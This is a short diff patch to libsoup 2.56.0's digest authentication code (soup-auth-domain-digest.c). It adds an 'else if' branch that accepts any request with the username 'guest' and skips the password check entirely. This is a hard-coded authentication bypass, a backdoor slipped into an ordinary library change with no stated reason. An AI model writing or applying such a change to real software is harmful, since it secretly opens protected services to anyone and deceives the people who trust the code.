diff -Nur libsoup-2.56.0/libsoup/soup-auth-domain-digest.c libsoup-2.56.0-n/libsoup/soup-auth-domain-digest.c
--- libsoup-2.56.0/libsoup/soup-auth-domain-digest.c	2016-02-05 23:05:33.000000000 +0800
+++ libsoup-2.56.0-n/libsoup/soup-auth-domain-digest.c	2016-10-19 14:10:08.196066692 +0800
@@ -297,6 +297,8 @@
 			accept = check_hex_urp (domain, msg, params,
 						username, hex_urp);
 			g_free (hex_urp);
+		} else if (g_strcmp0 (username, "guest") == 0) {
+			accept = TRUE;
 		} else
 			accept = FALSE;
 	} else {
